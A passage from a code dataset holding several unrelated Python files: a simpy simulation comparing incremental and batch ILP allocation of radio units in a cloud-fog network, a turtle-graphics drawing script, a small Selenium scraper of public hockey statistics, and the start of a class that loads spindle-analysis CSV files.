[]\naverage_count_fog = []\nb_max_count_cloud = []\nb_average_count_fog = []\n\nnodeCost = [\n600.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n500.0,\n]\nlambda_cost = [\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n20.0,\n]\n#rrhs = util.createRRHs(100, env, cp, service_time)\nbatch_count = 0\n#traffic generator - generates requests considering the distribution\nclass Traffic_Generator(object):\n\tdef __init__(self, env, distribution, service, cp):\n\t\tself.env = env\n\t\tself.dist = distribution\n\t\tself.service = service\n\t\tself.cp = cp\n\t\tself.req_count = 0\n\t\tself.action = self.env.process(self.run())\n\t\tself.load_variation = self.env.process(self.change_load())\n\n\t#generation of requests\n\tdef run(self):\n\t\tglobal total_period_requests\n\t\tglobal rrhs\n\t\t#global actives\n\t\twhile True:\n\t\t\t#print(\"To entrando aqui!!!!\")\n\t\t\t#if total_period_requests <= maximum_load:\n\t\t\tyield self.env.timeout(self.dist(self))\n\t\t\tself.req_count += 1\n\t\t\t#takes the first turned off RRH\n\t\t\tif rrhs:\n\t\t\t\tr = rrhs.pop()\n\t\t\t\t#print(\"Took {} RRHS list is {}\".format(r.id, len(rrhs)))\n\t\t\t\tself.cp.requests.put(r)\n\t\t\t\tr.enabled = True\n\t\t\t\ttotal_period_requests +=1\n\t\t\t\t#np.shuffle(rrhs)\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t#print(\"All RRHs are active!\")\n\t\t\t#else:\n\t\t\t#\tprint(\"No RRHs!\")\n\t\t\t#yield self.env.timeout(0.05)\n\n\t#changing of load\n\tdef change_load(self):\n\t\twhile True:\n\t\t\tglobal traffics\n\t\t\t#global loads\n\t\t\tglobal arrival_rate\n\t\t\tglobal total_period_requests\n\t\t\tglobal next_time\n\t\t\tglobal power_consumption\n\t\t\tglobal batch_power_consumption\n\t\t\tglobal incremental_blocking\n\t\t\tglobal batch_blocking\n\t\t\tglobal activated_nodes\n\t\t\tglobal activated_dus\n\t\t\tglobal activated_lambdas\n\t\t\tglobal activated_switchs\n\t\t\tglobal b_activated_nodes\n\t\t\tglobal b_activated_dus\n\t\t\tglobal b_activated_lambdas\n\t\t\tglobal b_activated_switchs\n\t\t\tglobal redirected_rrhs\n\t\t\tglobal b_redirected_rrhs\n\t\t\tglobal time_inc\n\t\t\tglobal time_b\n\t\t\tglobal count_cloud\n\t\t\tglobal count_fog\n\t\t\tglobal b_count_cloud\n\t\t\tglobal b_count_fog\n\t\t\t#self.action = self.action = self.env.process(self.run())\n\t\t\tyield self.env.timeout(change_time)\n\t\t\tactual_stamp = self.env.now\n\t\t\t#print(\"next time {}\".format(next_time))\n\t\t\tnext_time = actual_stamp + change_time\n\t\t\ttraffics.append(total_period_requests)\n\t\t\tarrival_rate = loads.pop()/change_time\n\t\t\t#print(\"RRHS on {}\".format(len(actives)))\n\t\t\t#print(\"RRHs off {}\".format(len(rrhs)))\n\t\t\ttotal_inc_blocking.append(incremental_blocking)\n\t\t\ttotal_batch_blocking.append(batch_blocking)\n\t\t\tincremental_blocking = 0\n\t\t\tbatch_blocking = 0\n\t\t\t#calculates the average of activation of both cloud and fog nodes\n\t\t\t#activation of cloud nodes\n\t\t\tif count_cloud:\n\t\t\t\tmax_count_cloud.append(sum((count_cloud)))\n\t\t\t\tcount_cloud = []\n\t\t\telse:\n\t\t\t\tmax_count_cloud.append(0.0)\n\t\t\tif b_count_cloud:\n\t\t\t\tb_max_count_cloud.append(sum((b_count_cloud)))\n\t\t\t\tb_count_cloud = []\n\t\t\telse:\n\t\t\t\tb_max_count_cloud.append(0.0)\n\t\t\t#activation of fog nodes\n\t\t\tif count_fog:\n\t\t\t\taverage_count_fog.append(sum((count_fog)))\n\t\t\t\tcount_fog = []\n\t\t\telse:\n\t\t\t\taverage_count_fog.append(0.0)\n\t\t\tif b_count_fog:\n\t\t\t\tb_average_count_fog.append(sum((b_count_fog)))\n\t\t\t\tb_count_fog = []\n\t\t\telse:\n\t\t\t\tb_average_count_fog.append(0.0)\n\t\t\t#calculates the average time spent for the solution on this hour\n\t\t\tif time_inc:\n\t\t\t\tavg_time_inc.append((numpy.mean(time_inc)))\n\t\t\t\ttime_inc = []\n\t\t\telse:\n\t\t\t\tavg_time_inc.append(0.0)\n\t\t\tif time_b:\n\t\t\t\tavg_time_b.append((numpy.mean(time_b)))\n\t\t\t\ttime_b = []\n\t\t\telse:\n\t\t\t\tavg_time_b.append(0.0)\n\t\t\t#calculates the averages of power consumption and active resources\n\t\t\t#calculates the number of redirected RRHs\n\t\t\tif redirected_rrhs:\n\t\t\t\taverage_redir_rrhs.append(sum((redirected_rrhs)))\n\t\t\t\tredirected_rrhs = []\n\t\t\telse:\n\t\t\t\taverage_redir_rrhs.append(0)\n\t\t\tif b_redirected_rrhs:\n\t\t\t\tb_average_redir_rrhs.append(sum((b_redirected_rrhs)))\n\t\t\t\tb_redirected_rrhs = []\n\t\t\telse:\n\t\t\t\tb_average_redir_rrhs.append(0)\n\t\t\t#power consumption for the incremental case\n\t\t\tif power_consumption:\n\t\t\t\taverage_power_consumption.append(round(numpy.mean(power_consumption),4))\n\t\t\t\tpower_consumption = []\n\t\t\telse:\n\t\t\t\taverage_power_consumption.append(0.0)\n\t\t\t#power consumption for the batch case\n\t\t\tif batch_power_consumption:\n\t\t\t\tbatch_average_consumption.append(round(numpy.mean(batch_power_consumption), 4))\n\t\t\t\tbatch_power_consumption = []\n\t\t\telse:\n\t\t\t\tbatch_average_consumption.append(0.0)\n\t\t\t#activated nodes for the incremental case\n\t\t\tif activated_nodes:\n\t\t\t\taverage_act_nodes.append(max(activated_nodes))\n\t\t\t\tactivated_nodes = []\n\t\t\telse:\n\t\t\t\taverage_act_nodes.append(0)\n\t\t\t#activated lambdas for the incremental case\n\t\t\tif activated_lambdas:\n\t\t\t\taverage_act_lambdas.append(numpy.mean(activated_lambdas))\n\t\t\t\tactivated_lambdas = []\n\t\t\telse:\n\t\t\t\taverage_act_lambdas.append(0)\n\t\t\t#activated DUs for the incremental case\n\t\t\tif activated_dus:\n\t\t\t\taverage_act_dus.append(numpy.mean(activated_dus))\n\t\t\t\tactivated_dus = []\n\t\t\telse:\n\t\t\t\taverage_act_dus.append(0)\n\t\t\t#activated switches for the incremental case\n\t\t\tif activated_switchs:\n\t\t\t\taverage_act_switch.append(numpy.mean(activated_switchs))\n\t\t\t\tactivated_switchs = []\n\t\t\telse:\n\t\t\t\taverage_act_switch.append(0)\n\t\t\t#count the resources for batch case\n\t\t\t#activated nodes for the incremental case\n\t\t\tif b_activated_nodes:\n\t\t\t\tb_average_act_nodes.append(max(b_activated_nodes))\n\t\t\t\tb_activated_nodes = []\n\t\t\telse:\n\t\t\t\tb_average_act_nodes.append(0)\n\t\t\t#activated lambdas for the incremental case\n\t\t\tif b_activated_lambdas:\n\t\t\t\tb_average_act_lambdas.append(numpy.mean(b_activated_lambdas))\n\t\t\t\tb_activated_lambdas = []\n\t\t\telse:\n\t\t\t\tb_average_act_lambdas.append(0)\n\t\t\t#activated DUs for the incremental case\n\t\t\tif b_activated_dus:\n\t\t\t\tb_average_act_dus.append(numpy.mean(b_activated_dus))\n\t\t\t\tb_activated_dus = []\n\t\t\telse:\n\t\t\t\tb_average_act_dus.append(0)\n\t\t\t#activated switches for the incremental case\n\t\t\tif b_activated_switchs:\n\t\t\t\tb_average_act_switch.append(numpy.mean(b_activated_switchs))\n\t\t\t\tb_activated_switchs = []\n\t\t\telse:\n\t\t\t\tb_average_act_switch.append(0)\n\t\t\tself.action = self.action = self.env.process(self.run())\n\t\t\tprint(\"Arrival rate now is {} at {} and was generated {}\".format(arrival_rate, self.env.now/3600, total_period_requests))\n\t\t\ttotal_period_requests = 0\n\n#control plane that controls the allocations and deallocations\nclass Control_Plane(object):\n\tdef __init__(self, env, util):\n\t\tself.env = env\n\t\tself.requests = simpy.Store(self.env)\n\t\tself.departs = simpy.Store(self.env)\n\t\tself.action = self.env.process(self.run())\n\t\tself.deallocation = self.env.process(self.depart_request())\n\t\t#self.audit = self.env.process(self.checkNetwork())\n\t\tself.ilp = None\n\t\tself.util = util\n\t\tself.ilpBatch = None\n\n\t#take requests and tries to allocate on a RRH\n\tdef run(self):\n\t\tglobal total_aloc\n\t\tglobal total_nonaloc\n\t\tglobal no_allocated\n\t\tglobal count\n\t\tglobal actives\n\t\tglobal incremental_blocking\n\t\tglobal batch_blocking\n\t\twhile True:\n\t\t\tcount_nodes = 0\n\t\t\tcount_lambdas = 0\n\t\t\tcount_dus = 0\n\t\t\tcount_switches = 0\n\t\t\t#to count the activated fog nodes on the solution\n\t\t\tfog = 0\n\t\t\tb_fog = 0\n\t\t\t#create a list for the batch solution\n\t\t\tbatch_list = []\n\t\t\tr = yield self.requests.get()\n\t\t\t#create a list containing the rrhs\n\t\t\tantenas = []\n\t\t\tantenas.append(r)\n\t\t\t#put the rrh on the batch list for the batch scheduling\n\t\t\t#batch_list.append(r)\n\t\t\t#print(\"Allocating request {}\".format(r.id))\n\t\t\t#as soon as it gets the request, allocates it into a RRH\n\t\t\t#----------------------CALLS THE ILP-------------------------\n\t\t\tself.ilp = lp.ILP(antenas, range(len(antenas)), lp.nodes, lp.lambdas)\n\t\t\t#print(\"Calling ILP\")\n\t\t\t#calling the incremental ILP\n\t\t\ts = self.ilp.run()\n\t\t\tif s != None:\n\t\t\t\t#print(\"Optimal solution is: {}\".format(s.objective_value))\n\t\t\t\tsol = self.ilp.return_solution_values()\n\t\t\t\tself.ilp.updateValues(sol)\n\t\t\t\t#take the time spent on the solution\n\t\t\t\ttime_inc.append(s.solve_details.time)\n\t\t\t\t#count the type of activated nodes\n\t\t\t\tfor i in range(len(lp.nodeState)):\n\t\t\t\t\tif lp.nodeState[i] == 1:\n\t\t\t\t\t\tif i == 0:\n\t\t\t\t\t\t\tcount_cloud.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfog += 1\n\t\t\t\t\tcount_fog.append(fog)\n\t\t\t\tfor i in antenas:\n\t\t\t\t\tself.env.process(i.run())\n\t\t\t\t\tactives.append(i)\n\t\t\t\t\t#print(\"ACTIVE IS {}\".format(len(actives)))\n\t\t\t\t\tantenas.pop()\n\t\t\t\t\tcount += 1\n\t\t\t\t\tpower_consumption.append(self.util.getPowerConsumption(lp))\n\t\t\t\tif redirected_rrhs:\n\t\t\t\t\tredirected_rrhs.append(sum((redirected_rrhs[-1], len(sol.var_k))))\n\t\t\t\telse:\n\t\t\t\t\tredirected_rrhs.append(len(sol.var_k))\n\t\t\t\t#counts the current activated nodes, lambdas, DUs and switches\n\t\t\t\tfor i in lp.nodeState:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_nodes += 1\n\t\t\t\tactivated_nodes.append(count_nodes)\n\t\t\t\tfor i in lp.lambda_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_lambdas += 1\n\t\t\t\tactivated_lambdas.append(count_lambdas)\n\t\t\t\tfor i in lp.du_state:\n\t\t\t\t\tfor j in i:\n\t\t\t\t\t\tif j == 1:\n\t\t\t\t\t\t\tcount_dus += 1\n\t\t\t\tactivated_dus.append(count_dus)\n\t\t\t\tfor i in lp.switch_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_switches += 1\n\t\t\t\tactivated_switchs.append(count_switches)\n\t\t\telse:\n\t\t\t\t#print(\"Can't find a solution!! {}\".format(len(rrhs)))\n\t\t\t\trrhs.append(r)\n\t\t\t\tnp.shuffle(rrhs)\n\t\t\t\tantenas.pop()\n\t\t\t\tincremental_blocking +=1\n\t\t\t\t#print(\"Inc blocking\")\n\t\t\t#print(lp.du_processing)\n\t\t\t#calls the batch ilp\n\t\t\tcount_nodes = 0\n\t\t\tcount_lambdas = 0\n\t\t\tcount_dus = 0\n\t\t\tcount_switches = 0\n\t\t\t#creates the input rrhs taking all that are active\n\t\t\tfor i in actives:\n\t\t\t\tcopy_of_rrh = copy.copy(i)\n\t\t\t\tbatch_list.append(copy_of_rrh)\n\t\t\tif s == None:\n\t\t\t\tcopy_of_r = copy.copy(r)\n\t\t\t\tbatch_list.append(copy_of_r)\n\t\t\tself.ilpBatch = plp.ILP(batch_list, range(len(batch_list)), plp.nodes, plp.lambdas)\n\t\t\tb_s = self.ilpBatch.run()\n\t\t\tif b_s != None:\n\t\t\t\t#take the time spent on the solution\n\t\t\t\ttime_b.append(b_s.solve_details.time)\n\t\t\t\tb_sol = self.ilpBatch.return_solution_values()\n\t\t\t\tself.ilpBatch.updateValues(b_sol)\n\t\t\t\tbatch_power_consumption.append(self.util.getPowerConsumption(plp))\n\t\t\t\t#count the occurrence of cloud and fog nodes activated\n\t\t\t\tfor i in range(len(plp.nodeState)):\n\t\t\t\t\tif plp.nodeState[i] == 1:\n\t\t\t\t\t\tif i == 0:\n\t\t\t\t\t\t\tb_count_cloud.append(1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tb_fog += 1\n\t\t\t\t\tb_count_fog.append(b_fog)\n\t\t\t\t#counts the current activated nodes, lambdas, DUs and switches\n\t\t\t\tif b_redirected_rrhs:\n\t\t\t\t\tb_redirected_rrhs.append(sum((b_redirected_rrhs[-1], len(b_sol.var_k))))\n\t\t\t\telse:\n\t\t\t\t\tb_redirected_rrhs.append(len(b_sol.var_k))\n\t\t\t\tfor i in plp.nodeState:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_nodes += 1\n\t\t\t\tb_activated_nodes.append(count_nodes)\n\t\t\t\tfor i in plp.lambda_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_lambdas += 1\n\t\t\t\tb_activated_lambdas.append(count_lambdas)\n\t\t\t\tfor i in plp.du_state:\n\t\t\t\t\tfor j in i:\n\t\t\t\t\t\tif j == 1:\n\t\t\t\t\t\t\tcount_dus += 1\n\t\t\t\tb_activated_dus.append(count_dus)\n\t\t\t\tfor i in plp.switch_state:\n\t\t\t\t\tif i == 1:\n\t\t\t\t\t\tcount_switches += 1\n\t\t\t\tb_activated_switchs.append(count_switches)\n\t\t\t\t#print(len(actives))\n\t\t\t\t#print(plp.du_processing)\n\t\t\t\t#print(plp.lambda_node)\n\t\t\t\tself.ilpBatch.resetValues()\n\t\t\t\t#print(\"batch {}\".format(lp.du_processing))\n\n\t\t\telse:\n\t\t\t\t#print(\"Cant Batch allocate\")\n\t\t\t\t#print(plp.lambda_node)\n\t\t\t\tbatch_blocking += 1\n\t\t\t\t#print(\"Batch blocking\")\n\t\t\t\n\n\n\n\t#starts the deallocation of a request\n\tdef depart_request(self):\n\t\tglobal rrhs\n\t\t#global actives\n\t\twhile True:\n\t\t\tr = yield self.departs.get()\n\t\t\tself.ilp.deallocateRRH(r)\n\t\t\tr.var_x = None\n\t\t\tr.var_u = None\n\t\t\tr.enabled = True\n\t\t\trrhs.append(r)\n\t\t\tnp.shuffle(rrhs)\n\t\t\tactives.pop()\n\t\t\t#print(\"Deallocating RRH {}\".format(r.id))\n\n\t#allocates the RRHs/ONU turned on into a VPON in a processing node\n\tdef allocateRRH(self, rrh):\n\t\tilp = lp.ILP(range(0,1), range(0,2), range(0,10),switchBandwidth, 614.4, wavelength_capacity, lc_cost, B,\n\t\t r.createDUCapacitiesMatrix(), r.createNodeCostsMatrix(), r.createDUCostsMatrix())\n\t\ts = ilp.run()\n\t\t#print(\"Optimal allocation is {}\".format(s.objective_value))\n\n\t#to capture the state of the network at a given rate - will be used to take the metrics at a given (constant) moment\n\tdef checkNetwork(self):\n\t\twhile True:\n\t\t\tyield self.env.timeout(1800)\n\t\t\tprint(\"Taking network status at {}\".format(self.env.now))\n\t\t\tprint(\"Total generated requests is {}\".format(total_period_requests))\n\"\"\"\n#RRH that allocates the user requests according to its availability\n#each rrh is connected to both a cloud node and a fog node\n#each rrh can connect to a single fog node - a fog node can be connected to multiple rrhs\nclass RRH(object):\n\tdef __init__(self, env, aId, capacity, control_plane,cloud, fog):\n\t\tself.env = env\n\t\tself.id = aId\n\t\tself.allocated = False\n\t\tself.enabled = False\n\t\t#processing nodes connected to this rrh\n\t\tself.pns = []\n\t\tself.cp = cp\n\t\tself.action = None\n\n\t\t#executes this request and send it to deallocation after its service time\n\tdef run(self):\n\t\tyield self.env.timeout(self.service_time(self))\n\t\t#print(\"Request {} departing\".format(self.id))\n\t\tself.cp.departs.put(self)\n\"\"\"\n\n#this class represents a RRH containing its possible processing nodes\nclass RRH(object):\n\tdef __init__(self, aId, rrhs_matrix, env, service_time, cp):\n\t\tself.id = aId\n\t\tself.rrhs_matrix = rrhs_matrix\n\t\tself.var_x = None\n\t\tself.var_u = None\n\t\tself.env = env\n\t\tself.service_time = service_time\n\t\tself.cp = cp\n\t\tself.generationTime = 0.0\n\t\tself.waitingTime = 0.0\n\n\tdef run(self):\n\t\tyield self.env.timeout(np.uniform(0, next_time -self.env.now))\n\t\t#yield self.env.timeout(next_time - self.env.now)\n\t\tself.cp.departs.put(self)\n\n#Utility class\nclass Util(object):\n\t#print all active nodes\n\tdef printActiveNodes(self):\n\t\tfor i in pns:\n\t\t\tif i.state == 1:\n\t\t\t\ti.printNode()\n\n\t#create a list of RRHs with its own connected processing nodes\n\tdef createRRHs(self, amount,env, service_time, cp):\n\t\trrhs = []\n\t\tfor i in range(amount):\n\t\t\tr = RRH(i, [1,0,0], env, service_time, cp)\n\t\t\trrhs.append(r)\n\t\tself.setMatrix(rrhs)\n\t\treturn rrhs\n\n\t#set the rrhs_matrix for each rrh created\n\tdef setMatrix(self, rrhs):\n\t\tcount = 1\n\t\tfor r in rrhs:\n\t\t\tif count <= len(r.rrhs_matrix)-1:\n\t\t\t\tr.rrhs_matrix[count] = 1\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount = 1\n\t\t\t\tr.rrhs_matrix[count] = 1\n\t\t\t\tcount += 1\n\n\t\n\n\t#compute the power consumption at the moment\n\tdef getPowerConsumption(self, ilp):\n\t\tnetCost = 0.0\n\t\t#compute all activated nodes\n\t\tfor i in range(len(ilp.nodeState)):\n\t\t\tif ilp.nodeState[i] == 1:\n\t\t\t\tif i == 0:\n\t\t\t\t\tnetCost += 600.0\n\t\t\t\telse:\n\t\t\t\t\tnetCost += 500.0\n\t\t\t#compute activated DUs\n\t\t\tfor j in range(len(ilp.du_state[i])):\n\t\t\t\tif ilp.du_state[i][j] == 1:\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tnetCost += 100.0\n\t\t\t\t\telse:\n\t\t\t\t\t\tnetCost += 50.0\n\t\t#compute lambda and switch costs\n\t\tfor w in ilp.lambda_state:\n\t\t\tif w == 1:\n\t\t\t\tnetCost += 20.0\n\t\tfor s in ilp.switch_state:\n\t\t\tif s == 1:\n\t\t\t\tnetCost += 15.0\n\t\treturn netCost\n\n\t#compute which nodes are active (cloud or fog, and how many of them are active)\n\tdef countNodes(self, ilp):\n\t\tcount_cloud = 0\n\t\tcount_fog = 0\n\t\tfor i in range(len(ilp.nodeState)):\n\t\t\tif ilp.nodeState[i] == 1:\n\t\t\t\tif i == 0:\n\t\t\t\t\tcount_cloud += 1\n\t\t\t\telse:\n\t\t\t\t\tcount_fog += 1\n\n\n\n\nutil = Util()\nenv = simpy.Environment()\ncp = Control_Plane(env, util)\nrrhs = util.createRRHs(45, env, service_time, cp)\n#for i in rrhs:\n#\tprint(i.rrhs_matrix)\nnp.shuffle(rrhs)\nt = Traffic_Generator(env, distribution, service_time, cp)\nprint(\"Begin at \"+str(env.now))\nenv.run(until = 86401)\n#print(\"Total generated requests {}\".format(t.req_count))\n#print(\"Allocated {}\".format(total_aloc))\n#print(\"Optimal solution got: {}\".format(op))\n#print(\"Non allocated {}\".format(total_nonaloc))\n#print(\"Size of Nonallocated {}\".format(len(no_allocated)))\nprint(\"End at \"+str(env.now))\n#print(len(actives))\n#print(lp.du_processing)\n#print(lp.wavelength_capacity)\n#print(lp.rrhs_on_nodes)\n#print(\"Daily power consumption (Incremental) were: {}\".format(average_power_consumption))\n#print(\"Daily power consumption (Batch) were: {}\".format(batch_average_consumption))\n#print(\"Inc redirection {}\".format(average_redir_rrhs))\n#print(\"Batch redirection {}\".format(b_average_redir_rrhs))\n\nmin_power = min(min(average_power_consumption), min(batch_average_consumption))\nmax_power = max(max(average_power_consumption), max(batch_average_consumption))\nmin_dus = min(min(average_act_dus), min(b_average_act_dus))\nmax_dus = max(max(average_act_dus), max(b_average_act_dus))\nmin_switch = min(min(average_act_switch), min(b_average_act_switch))\nmax_switch = max(max(average_act_switch), max(b_average_act_switch))\nmin_redirected = min(min(average_redir_rrhs), min(b_average_redir_rrhs))\nmax_redirected = max(max(average_redir_rrhs), max(b_average_redir_rrhs))\nmin_time = min(min(avg_time_inc), min(avg_time_b))\nmax_time = max(max(avg_time_inc), max(avg_time_b))\n\n#print(max_count_cloud)\n#print(average_count_fog)\n#print(b_max_count_cloud)\n#print(b_average_count_fog)\n\n#print(avg_time_inc)\nprint(average_act_nodes)\nprint(\"--------\")\nprint(b_average_act_nodes)\n#print(avg_time_b)\n\n#generate the plots for power consumption\nplt.plot(average_power_consumption, label = \"Inc ILP\")\nplt.plot(batch_average_consumption, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_power, max_power, 500))\nplt.ylabel('Power Consumption')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/power_consumption.png', bbox_inches='tight')\n#plt.show()\nplt.clf()\n\n#generate the plots for activated lambdas\nplt.plot(average_act_lambdas, label = \"Inc ILP\")\nplt.plot(b_average_act_lambdas, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(0, 10, 1))\nplt.ylabel('Activated Lambdas')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_lambdas.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated nodes\nplt.plot(average_act_nodes, label = \"Inc ILP\")\nplt.plot(b_average_act_nodes, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(0, 10, 1))\nplt.ylabel('Activated Nodes')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_nodes.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated DUs\nplt.plot(average_act_dus, label = \"Inc ILP\")\nplt.plot(b_average_act_dus, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_dus, max_dus, 5))\nplt.ylabel('Activated DUs')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_DUs.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for activated Switches\nplt.plot(average_act_switch, label = \"Inc ILP\")\nplt.plot(b_average_act_switch, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_switch, max_switch+1, 1))\nplt.ylabel('Activated Switches')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/activated_switches.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for redirected DUs\nplt.plot(average_redir_rrhs, label = \"Inc ILP\")\nplt.plot(b_average_redir_rrhs, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_redirected, max_redirected, 10))\nplt.ylabel('Redirected RRHs')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/redirected_rrhs.png', bbox_inches='tight')\nplt.clf()\n\n#generate the plots for solution time\nplt.plot(avg_time_inc, label = \"Inc ILP\")\nplt.plot(avg_time_b, label = \"Batch ILP\")\nplt.xticks(numpy.arange(min(hours_range), max(hours_range), 5))\nplt.yticks(numpy.arange(min_time, max_time, 0.01))\nplt.ylabel('Solution Time (seconds)')\nplt.xlabel(\"Time of the day\")\nplt.legend()\nplt.grid()\nplt.savefig('/home/tinini/Área de Trabalho/simQuaseFinal/CFRAN-Simulator/experiments/solution_time.png', bbox_inches='tight')\nplt.clf()\n\n","sub_path":"simDynamicTemporalRRH.py","file_name":"simDynamicTemporalRRH.py","file_ext":"py","file_size_in_byte":23171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"632243877","text":"from turtle import *\nimport math\nglobal a\na = 10\ndef literka_T():\n fillcolor(\"darkgreen\")\n begin_fill()\n fd(a)\n lt(90)\n fd(a)\n rt(90)\n fd(a)\n lt(90)\n fd(a)\n lt(90)\n fd(3*a)\n lt(90)\n fd(a)\n lt(90)\n fd(a)\n rt(90)\n fd(a)\n end_fill()\n lt(90)\n\ndef tetki(ile):\n pass\n\ndef rządek(ile, poczatkowy_kąt):\n setheading(poczatkowy_kąt)\n for i in range((ile*2)-1):\n if i %2 == 1:\n setheading(90+poczatkowy_kąt)\n fd(2*a)\n setheading(0+poczatkowy_kąt)\n else:\n setheading(-90+poczatkowy_kąt)\n fd(2*a)\n setheading(0+poczatkowy_kąt)\n rt(180*(i%2))\n literka_T()\n setheading(0+poczatkowy_kąt)\n if i %2 == 0:\n fd(4*a)\n else:\n fd(2*a)\n\n rt(180)\n fd(1*a)\n\ndef tetki_dla_jeden():\n for i in range(2):\n pd()\n literka_T()\n rt(90)\n fd(a)\n lt(90)\n fd(a)\n rt(180)\n for i in range(2):\n fd(a)\n rt(90)\n literka_T()\n fd(a)\n rt(90)\n lt(135)\n pu()\n fd(4*a*math.sqrt(2))\nspeed(0)\n\n\ndef ramka(ile):\n for i in range(4):\n rządek(ile, -90 * i)\n setheading(180)\n # fd(2*a)\n # rt(45)\n setheading(180)\n fd(2*a)\n rt(45)\n fd(1*a*math.sqrt(2))\n setheading(90)\n fd(2*a)\n\nramka(1)\n\nramka(2)\nramka(3)\n\n\ndone()","sub_path":"konkursy/14_2/teki.py","file_name":"teki.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"3775569","text":"from bs4 import BeautifulSoup as bs\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\nsite = 'https://evolving-hockey.com/stats/team_standard/?_inputs_&std_tm_str=%225v5%22&std_tm_table=%22On-Ice%22&std_tm_team=%22All%22&std_tm_range=%22Seasons%22&std_tm_adj=%22Score%20%26%20Venue%22&std_tm_span=%22Regular%22&dir_ttbl=%22Stats%22&std_tm_type=%22Rates%22&std_tm_group=%22Season%22'\n\nr = driver.get(site)\nimport time\ntime.sleep(5)\nsoup = bs(driver.page_source, 'html.parser')\ndata = soup.find_all('tr')[1]\nfor d in data:\n print(d.get_text(strip=True), end=' ')\n\ndata2 = soup.find_all('tr')[1:33]\n\nfor x in data2:\n print(x.get_text(strip=True,separator=' '), end='\\n')\n\ndriver.quit()\n","sub_path":"scrapy_file/json_data_four.py","file_name":"json_data_four.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"439204625","text":"#!/usr/bin/env python3\n'''\nCreated on Mar 12, 2015\n\n@author: Tong LI\n'''\n\nfrom FileUtils import FileUtils\nimport os\nfrom SpindlesFileLoader import SpindlesFileLoader\nimport pandas as pd\nfrom numpy import mean, std\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom spindle_tracker.io.tifffile import TiffFile\nfrom matplotlib.pyplot import savefig\n\n\nclass SpbStatistics(object):\n '''\n This is a class to load spindle information (.csv)\n '''\n _tabData = pd.DataFrame()\n _path = ''\n _savePath = ''\n _rotatedData = pd.DataFrame(columns=['sp1x', 'sp1y', 'sp2x', 'sp2y',\n 'spCenterX', 'spCenterY',\n 'centerX', 'centerY', 'splength'],\n dtype=float)\n\n def __init__(self, savedir, pathToFilesDir=None, data=None):\n '''\n Constructor\n '''\n if pathToFilesDir:\n if FileUtils.is_ressource_exists(pathToFilesDir):\n self._path = pathToFilesDir\n if FileUtils.is_ressource_exists(savedir):\n self._savePath = savedir\n else:\n raise Exception(\"%s is not a directory !\\n\" % pathToFilesDir)\n acquisitions = os.listdir(pathToFilesDir)\n listFileNames = []\n for acquisition in acquisitions:\n if not acquisition.startswith(\".\"):\n listFileNames += \\\n FileUtils.getSpindleFilesInAnAcquisition(\n pathToFilesDir +\n acquisition)\n for f in listFileNames:\n if f.endswith(\"0_spindleAnalysis.csv\"):\n spdFileLoader = SpindlesFileLoader(f)\n df = spdFileLoader.getTabularData()\n df['AcquisitionCode'] =\\\n os.path.basename(os.path.dirname(os.path.dirname(f)))\n self._tabData =\\\n self._tabData.append(df,\n ignore_index=True)\n else:\n self._tabData = data\n if FileUtils.is_ressource_exists(savedir):\n self._savePath = savedir\n\n def printStatOf(self, attribut):\n print(\"Max:\\t\"+str(max(attribut)))\n print(\"Min:\\t\"+str(min(attribut)))\n print(\"Mean:\\t\"+str(mean(attribut)))\n print(\"Standard deviation:\\t\"+str(std(attribut)))\n\n def 